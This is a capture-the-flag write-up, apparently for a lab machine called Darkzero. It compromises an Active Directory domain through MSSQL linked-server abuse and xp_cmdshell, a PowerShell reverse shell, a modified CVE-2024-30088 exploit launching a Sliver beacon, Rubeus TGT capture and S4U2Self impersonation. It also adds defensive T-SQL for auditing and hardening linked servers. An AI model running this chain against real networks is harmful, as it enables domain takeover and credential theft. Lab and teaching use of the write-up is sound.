Darkzero is a hard Windows machine that starts with authenticated access, as guest, to the MSSQL server on DC01. That server has a linked server pointing to DC02, a member of the darkzero.ext domain. By abusing that link, which authenticates to DC02 with the sql_svc login, we were able to execute commands on DC02. Using CVE-2024-30088, we then ran a beacon as SYSTEM. Since DC02 is configured for unconstrained delegation, it cached the logon credentials (TGT) of DC01 when DC01 authenticated through the linked server; that ticket was used with S4U2Self to become domain admin in the darkzero.htb domain.

PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 18:51:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

We started by enumerating the domain with the rusthound-ce collector, passing --ldaps because LDAP signing was enabled on the DC.

$ ~/tools/rusthound-ce -u john.w -p 'RFulUtONCOL!' -i 10.10.11.89 -d darkzero.htb --dns-tcp --ldaps

Furthermore, we could authenticate to the MSSQL server with the initial credentials, landing as the guest user.

$ impacket-mssqlclient darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>

Linked server

We could not find any interesting data in the databases.

SQL (darkzero\john.w  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master   0
tempdb   0
model    0
msdb     1

However, we found a linked server to DC02.darkzero.ext defined on the DC01 MSSQL server. Its login mapping is not self-mapping: instead of forwarding our own credentials, it authenticates to the remote server with a fixed remote login (dc01_sql_svc).

SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME           SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
-----------------  -----------------  ------------  ------------------  -------------------  -------------  -------
DC01               SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL
DC02.darkzero.ext  SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL

Linked Server      Local Login       Is Self Mapping   Remote Login
-----------------  ----------------  ----------------  ------------
DC02.darkzero.ext  darkzero\john.w   0                 dc01_sql_svc

We found that this remote login holds the sysadmin role on DC02 (the query below checks sysadmin, securityadmin, dbcreator and public membership on the linked server).

SQL (darkzero\john.w  guest@master)> EXEC('SELECT IS_SRVROLEMEMBER(''sysadmin''), IS_SRVROLEMEMBER(''securityadmin''), IS_SRVROLEMEMBER(''dbcreator''), IS_SRVROLEMEMBER(''public'')') AT [DC02.darkzero.ext];
- - - -
1 1 1 1
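As an added, defender-side example (not part of the original writeup), the following T-SQL audits the same linked-server configuration that enum_links and the IS_SRVROLEMEMBER check revealed above: it lists every linked server with its login mappings, flags links that authenticate with a fixed remote login, and then checks which server roles the mapped login holds on the remote side. Run it on the instance that holds the links (DC01 here). The server and linked-server names are the ones from this writeup; the column aliases and comments are mine.

```sql
-- Added audit query (not from the writeup). Run as a login with VIEW ANY DEFINITION
-- or sysadmin on the instance that defines the links (DC01).
-- A row with is_self_mapping = 0 and a non-NULL remote_login means the link
-- authenticates to the remote instance with a fixed remote login: every local
-- principal shown in local_login (or every login, when local_login is NULL, which
-- is the default mapping) inherits whatever that remote login can do over there.
SELECT
    s.name                   AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,    -- EXEC (...) AT <server> only works when RPC Out is on
    sp.name                  AS local_login,      -- NULL = applies to all logins
    ll.uses_self_credential  AS is_self_mapping,  -- 1 = caller's own credentials
    ll.remote_name           AS remote_login      -- fixed remote login, if any
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
      ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
      ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- For each fixed mapping found above, check what the remote login can do on the
-- remote instance. This is the same check the writeup ran against DC02, with
-- SYSTEM_USER added so the result shows which remote login was actually used.
EXEC ('SELECT SYSTEM_USER                         AS remote_login,
              IS_SRVROLEMEMBER(''sysadmin'')      AS is_sysadmin,
              IS_SRVROLEMEMBER(''securityadmin'') AS is_securityadmin,
              IS_SRVROLEMEMBER(''dbcreator'')     AS is_dbcreator')
     AT [DC02.darkzero.ext];
```

A link that shows is_self_mapping = 0 together with is_sysadmin = 1 on the remote side is the configuration this writeup abused: any login allowed to use the link, guest included, becomes sysadmin on the remote instance.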

We could then execute OS commands through xp_cmdshell on the linked server as the mapped svc_sql user, and the whoami output shows that this account belongs to the darkzero.ext domain.

SQL (darkzero\john.w  guest@master)> EXEC('exec xp_cmdshell ''whoami'' ') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
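As an added mitigation example, not from the writeup, this T-SQL closes the two weaknesses the chain relied on: xp_cmdshell being enabled on DC02, and a link on DC01 that maps local logins to a sysadmin remote login. The server and login names are the ones from the writeup; the statements themselves are standard SQL Server administration.

```sql
-- Added hardening example (not from the writeup). Statements are grouped by the
-- instance they must be run on.

-- === On DC02 (the linked instance) ===
-- 1) xp_cmdshell is off by default; turn it back off so a link that lands as
--    sysadmin cannot run OS commands as the SQL Server service account.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 2) The remote login used by the link does not need to be sysadmin; drop it from
--    the role and grant only the database permissions the link actually needs.
ALTER SERVER ROLE sysadmin DROP MEMBER [dc01_sql_svc];

-- === On DC01 (the instance that defines the link) ===
-- 3) Replace the fixed remote login with self-mapping, so every caller authenticates
--    to DC02 with its own credentials and a guest-level login gains nothing extra.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'DC02.darkzero.ext', @locallogin = N'darkzero\john.w';
EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'DC02.darkzero.ext', @useself = N'TRUE', @locallogin = N'darkzero\john.w';

-- 4) Confirm the change: the mapping should now show uses_self_credential = 1 and
--    remote_name = NULL.
SELECT s.name, ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.name = N'DC02.darkzero.ext';
```

Self-mapping only helps when the remote side can actually authenticate the caller (Windows logins with Kerberos delegation set up correctly, or matching SQL logins); where that is not possible, keep the fixed remote login but give it the least privilege the link needs rather than sysadmin.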

We also enumerated some network information on the linked server, which showed that DC02 sits on an internal subnet.

SQL (darkzero\john.w  guest@master)> EXEC('exec xp_cmdshell ''ipconfig'' ') AT [DC02.darkzero.ext];
<SNIP>
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.20.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.20.1
<SNIP>

Another way to enumerate and execute commands on the linked DC02 server is the use_link command of impacket-mssqlclient, passing the name of the linked server; the prompt then shows the remote login in use (dc01_sql_svc, dbo on master).

SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)>

After confirming network connectivity from DC02 back to our attacking machine, we used a PowerShell reverse shell, launched through xp_cmdshell, to get a shell on that host.

xp_cmdshell "powershell.exe -nop -w hidden -enc [base_64_payload]"

DC02 Privilege Escalation

We saved the systeminfo output from DC02 to a file and ran it through wes.py (windows-exploit-suggester) to find potential CVEs.

wes systeminfo.txt -c

This flagged CVE-2024-30088, a Windows kernel vulnerability that was present because the corresponding KB hotfix was missing.
To exploit it, we used this POC.
After compiling the source and running the POC, we found that the exploit spawns a new cmd.exe process running as SYSTEM. As a workaround, we changed the source so that it instead executes a Sliver beacon we had uploaded to DC02, which gave us a SYSTEM session on our locally running sliver-server.

CreateProcessFromHandle(hWinLogon, (LPSTR)"C:\\Windows\\system32\\cmd.exe /c C:\\Users\\svc_sql\\Documents\\sliver.exe");

Now that we have administrative access on DC02, the domain controller for darkzero.ext, we know that, as a DC, it is configured for unconstrained delegation by default, so it caches the TGTs of accounts that authenticate to it. Since DC01 authenticates to the linked MSSQL server on DC02 with its machine account, we ran Rubeus in monitor mode to capture that cached TGT.

rubeus -- monitor /interval:10 /service:krbtgt

The DC01$ machine-account TGT we obtained could not be used on its own to authenticate to DC01 as SYSTEM. Therefore, we performed S4U2Self: with that TGT, the DC01$ account requests a service ticket to itself on behalf of the Administrator user, and the /altservice option rewrites the service name to cifs/DC01.darkzero.htb.

rubeus -i -- s4u /impersonateuser:Administrator /user:DC01$ /self /altservice:cifs/DC01.darkzero.htb /dc:DC01.darkzero.htb /nowrap /ticket:"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"

This gave us a CIFS service ticket for the Administrator user on DC01, which we could use to authenticate to it.

[*] rubeus output:

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.3.2

[*] Action: S4U

[*] Action: S4U

[*] Building S4U2self request for: 'DC01$@DARKZERO.HTB'
[*] Using domain controller: DC01.darkzero.htb (10.10.11.89)
[*] Sending S4U2self request to 10.10.11.89:88
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/DC01.darkzero.htb'
[*] Got a TGS for 'Administrator' to 'cifs@DARKZERO.HTB'
[*] base64(ticket.kirbi):

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

We then copied that base64 ticket into a .b64 file and decoded it to .kirbi as a first step.

cat dc01.b64 | base64 -d > dc01.kirbi

Then we converted the .kirbi ticket to .ccache format so we could use it as the domain Administrator's ticket against DC01.

impacket-ticketConverter dc01.kirbi dc01.ccache 
export KRB5CCNAME=./dc01.ccache

Finally, we were able to authenticate to the domain controller DC01 in darkzero.htb with that ticket and compromise the domain.

$ impacket-psexec darkzero.htb/administrator@dc01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file hcYhFOzy.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service Hwsi on dc01.darkzero.htb.....
[*] Starting service Hwsi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32> hostname
DC01

C:\Windows\System32> whoami
nt authority\system